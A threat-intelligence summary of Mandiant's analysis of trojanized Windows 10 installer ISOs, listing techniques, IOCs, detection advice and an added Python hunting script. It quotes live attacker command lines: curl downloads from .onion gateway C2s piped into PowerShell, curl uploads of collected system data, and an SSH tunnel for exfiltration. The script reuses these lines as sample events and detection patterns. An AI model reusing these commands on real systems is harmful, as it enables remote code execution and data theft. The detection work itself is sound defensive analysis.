Keypoints
- Trojanized Windows 10 ISO images (e.g., Win10_21H2_Ukrainian_x64.iso) were hosted on Ukrainian- and Russian-language torrent sites and configured to run malicious actions during setup.
- The ISOs alter legitimate Windows scheduled tasks (GatherNetworkInfo, Consolidator) to add PowerShell downloader actions that use curl to contact .onion TOR gateway C2s and include the device UUID in request headers.
- SetupComplete.cmd on the ISO disables telemetry, Windows updates and Microsoft services, blocks Microsoft domains/IPs, and contains activation/piracy scripts to modify system behavior and impair defenses.
- Initial lightweight footholds (scheduled tasks executing PowerShell) performed targeted reconnaissance (exporting sysinfo, directory listings, geolocation) and exfiltrated data via curl to TOR C2s.
- When targets were identified as high value, operators deployed additional backdoors: SPAREPART (Windows service DLL with randomized beacon timing), BEACON (Cobalt Strike), and STOWAWAY (public backdoor/proxy).
- Operators used additional tooling and channels for data theft and redundancy — downloading TOR, running Sheret HTTP server locally and tunneling via localhost.run (SSH) to exfiltrate removable-drive files.
MITRE Techniques
- [T1053.005] Scheduled Task/Job – The actor modified legitimate scheduled tasks (GatherNetworkInfo, Consolidator) to add a secondary action executing a PowerShell downloader (“Executes: powershell.exe curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion.ws -H ('h:'+(wmic csproduct get UUID)) | powershell.exe”)
- [T1059.001] PowerShell – PowerShell is used to execute downloaded commands and perform on-host reconnaissance and exfiltration (“The altered tasks … executed a PowerShell command. This command makes use of the curl binary to download a command from the C2 server, then the command is executed through PowerShell.”)
- [T1071.001] Application Layer Protocol: Web Protocols (HTTP/S) – C2 and exfiltration used HTTP(S) via curl to .onion gateway URLs and cdnworld[.]org (“curl.exe -k https://ufowdauczwpa4…onion[.]moe … --data-binary '@sysinfo' -k https://ufowdauczwpa4…onion[.]moe”)
- [T1090] Proxy – Use of Tor gateways and tunneling (onion.moe/onion.ws) as proxying/C2 infrastructure (“The C2 servers in both instances were addresses to TOR gateways. These gateways advertise as a mechanism for users to access TOR from the standard internet (onion.moe, onion.ws).”)
- [T1543.003] Create or Modify System Process: Windows Service – Deployment of SPAREPART as a Windows service (“service named ‘Microsoft Delivery Network’ was created to execute %SYSTEM32%\MicrosoftDeliveryNetwork\MicrosoftDeliveryCenter …”)
- [T1105] Ingress Tool Transfer – Tools and installers were downloaded to victims (TOR bundle.zip, BEACON/STOWAWAY payloads) from C2 or internet hosts (“bundle.zip … Downloaded from https://ufowdaucz…onion[.]moe/bundle.zip”)
- [T1562.001] Disable or Modify Security Tools – SetupComplete.cmd disables telemetry, Windows updates, and blocks Microsoft services/domains to reduce detection (“The script is responsible for disabling several legitimate Windows services and tasks, disabling Windows updates, blocking IP addresses and domains related to legitimate Microsoft services”)
- [T1041] Exfiltration Over C2 Channel – Collected system and directory data exported to sysinfo and uploaded via curl to C2 (.onion) (“curl.exe -H ('h:'+(wmic csproduct get UUID)) --data-binary '@sysinfo' -k https://ufowdaucz…onion[.]moe”)
Indicators of Compromise
- [File name / ISO] Trojanized Windows installer – Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4)
- [File hashes] Malware binaries – MicrosoftDeliveryCenter (SPAREPART) MD5 f9cd5b145e372553dded92628db038d8; AzureSettingSync.dll (BEACON) MD5 59a3129b73ba4756582ab67939a2fe3c
- [File hashes] STOWAWAY binaries – C:\Windows\System32\splwow86.exe MD5 0f06afbb4a2a389e82de6214590b312b; %LOCALAPPDATA%SODUsvc.exe MD5 a8e7d8ec0f450037441ee43f593ffc7c
- [Domains / Onion C2s] Primary TOR gateway C2s – ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion[.]moe, 56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid[.]onion[.]moe
- [Domains] BEACON C2 domains – https://cdnworld[.]org/34192–general-feedback/… , https://cdnworld[.]org/34702–general/sync/… (used by AzureSettingSync.dll)
- [IPs] STOWAWAY C2 IPs – 193.142.30[.]166:443, 91.205.230[.]66:8443
- [Paths / Scheduled tasks] Trojanized scheduled tasks and persistence – C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf), C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d)
Mandiant’s forensic analysis shows the infection chain begins with a trojanized Windows 10 ISO (example: Win10_21H2_Ukrainian_x64.iso, MD5 b7a0cd8…) that contains an added SetupComplete.cmd and modified Windows scheduled task files. The ISO alters the legitimate GatherNetworkInfo and Consolidator scheduled tasks to add a secondary action which runs curl to retrieve tasking and pipes it to PowerShell; example command lines observed include “curl.exe -k https://ufowdaucz…onion[.]moe -H ('h:'+(wmic csproduct get UUID)) | powershell.exe” and similar curl uploads using “--data-binary '@sysinfo'”. SetupComplete.cmd bundles public scripts to disable Windows telemetry and updates, block Microsoft domains/IPs, disable OneDrive, and run activation steps, which facilitates stealth and impedes normal security telemetry.
Post-compromise triage uses the scheduled-task PowerShell bootstrap to enumerate system info and file listings (Get-ComputerInfo, Get-ChildItem exports to sysinfo then optional compression) and to exfiltrate via HTTP(S) to TOR gateway C2s. If a device is judged valuable, operators deploy additional tools: SPAREPART (a Windows service DLL “MicrosoftDeliveryCenter” that reads the device UUID via GetSystemFirmwareTable, randomizes beacon timing, uses WinHTTP with a hardcoded Firefox user-agent to GET tasking, and pipes returned commands to powershell.exe), BEACON (dropped as AzureSettingSync.dll contacting cdnworld[.]org), and STOWAWAY (compiled binaries connecting to IPs 193.142.30.166:443 and 91.205.230.66:8443). Operators also staged ingress tools (TOR installer bundle.zip) and used Sheret plus SSH tunneling to localhost.run for interactive file serving and exfiltration of removable-drive files (ssh -R 80:localhost:80 -i defaultssh localhost[.]run …).
Key detection artifacts and procedures: inspect modified scheduled tasks under C:\Windows\System32\Tasks (notably GatherNetworkInfo and Consolidator), search for SetupComplete.cmd variants and the ISO MD5 and malware MD5s listed above, look for PowerShell invocations that call curl.exe to .onion[.]moe/.onion[.]ws addresses with a header built from “wmic csproduct get UUID”, and watch for new services named like “Microsoft Delivery Network” executing MicrosoftDeliveryCenter. Network detection should flag connections to the listed .onion gateway proxies, cdnworld[.]org BEACON endpoints, and the STOWAWAY IPs; hunting queries should also capture exports to sysinfo/sysinfo.zip and use of Sheret/localhost.run SSH tunnels.
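The host-side hunting procedure above (extra actions on GatherNetworkInfo/Consolidator, curl.exe to .onion gateway hosts carrying a wmic-derived UUID header, sysinfo uploads, downloads piped into PowerShell) worked into a small script. This is an added example, not code from Mandiant or the report. It assumes process-creation telemetry that exposes a CommandLine field and scheduled-task definitions in the standard Task Scheduler XML schema; the events and task definitions embedded below are constructed to mirror the reported command lines, and the clean GatherNetworkInfo action is assumed for illustration.

```python
"""Hunting helpers for the trojanized-ISO tradecraft (added example, not the report's code)."""
import re
import xml.etree.ElementTree as ET

# Legitimate tasks the ISO modifies; each normally ships with a single <Exec> action.
TARGET_TASKS = {"GatherNetworkInfo", "Consolidator"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# TOR gateway hosts used as C2: <onion address>.onion.moe / .onion.ws
ONION_GATEWAY_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\.(?:moe|ws)\b", re.I)
# Device UUID gathered with wmic and placed in a request header
UUID_HEADER_RE = re.compile(r"wmic\s+csproduct\s+get\s+uuid", re.I)
# Upload of the recon output file ('sysinfo' / 'sysinfo.zip')
SYSINFO_UPLOAD_RE = re.compile(r"--data-binary\s+['\"]?@sysinfo", re.I)
# Downloaded tasking piped straight into PowerShell
PIPE_TO_PS_RE = re.compile(r"\|\s*powershell(?:\.exe)?", re.I)


def score_command_line(cmd: str) -> list[str]:
    """Return the suspicious traits found in one process command line, in a fixed order."""
    hits = []
    is_curl = "curl" in cmd.lower()
    if is_curl and ONION_GATEWAY_RE.search(cmd):
        hits.append("curl_to_onion_gateway")
    if is_curl and UUID_HEADER_RE.search(cmd):
        hits.append("device_uuid_in_header")
    if SYSINFO_UPLOAD_RE.search(cmd):
        hits.append("sysinfo_upload")
    if is_curl and PIPE_TO_PS_RE.search(cmd):
        hits.append("download_piped_to_powershell")
    return hits


def hunt_process_events(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and traits of every event with at least one hit."""
    findings = []
    for i, ev in enumerate(events):
        hits = score_command_line(ev.get("CommandLine", ""))
        if hits:
            findings.append((i, hits))
    return findings


def task_extra_actions(task) -> list[str]:
    """Command lines of every <Exec> action beyond the first in a task definition.

    Accepts the XML as a string or an already-parsed Element. On-disk task files under
    C:\\Windows\\System32\\Tasks are UTF-16 XML; ET.parse(path).getroot() handles the BOM.
    """
    root = task if isinstance(task, ET.Element) else ET.fromstring(task)
    cmds = []
    for ex in root.findall(".//t:Actions/t:Exec", TASK_NS):
        command = ex.findtext("t:Command", default="", namespaces=TASK_NS)
        args = ex.findtext("t:Arguments", default="", namespaces=TASK_NS)
        cmds.append(f"{command} {args}".strip())
    return cmds[1:]


def flag_task(task_name: str, task) -> list[tuple[str, list[str]]]:
    """Extra actions of a modified target task, each paired with its command-line traits."""
    if task_name not in TARGET_TASKS:
        return []
    return [(cmd, score_command_line(cmd)) for cmd in task_extra_actions(task)]


# Constructed samples mirroring the reported tradecraft (not captured telemetry).
ONION = "ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe curl.exe -k https://{ONION}.onion.ws "
                    "-H ('h:'+(wmic csproduct get UUID)) | powershell.exe"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -H ('h:'+(wmic csproduct get UUID)) --data-binary '@sysinfo' "
                    f"-k https://{ONION}.onion.moe"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -k https://example.com/release.json"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ComputerInfo"},
]
# Assumed single-action definition of the clean task, and the same file with an appended action.
CLEAN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="LocalSystem">
    <Exec><Command>%windir%\\system32\\gatherNetworkInfo.vbs</Command></Exec>
  </Actions>
</Task>"""
TROJANIZED_TASK = CLEAN_TASK.replace(
    "</Actions>",
    f"  <Exec><Command>powershell.exe</Command><Arguments>curl.exe -k https://{ONION}.onion.ws "
    "-H ('h:'+(wmic csproduct get UUID)) | powershell.exe</Arguments></Exec>\n  </Actions>")

if __name__ == "__main__":
    for i, hits in hunt_process_events(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(hits)}")
    for cmd, hits in flag_task("GatherNetworkInfo", TROJANIZED_TASK):
        print(f"GatherNetworkInfo extra action: {cmd!r} -> {hits}")
```

Running the script flags the two constructed curl events and leaves the benign curl and PowerShell invocations alone; the task check reports the appended PowerShell action and scores it with the same traits. Any extra action on a target task is worth a look even when its traits list is empty, since the actor can change the downloader but has to keep the second action to retain the foothold.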
Read more: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government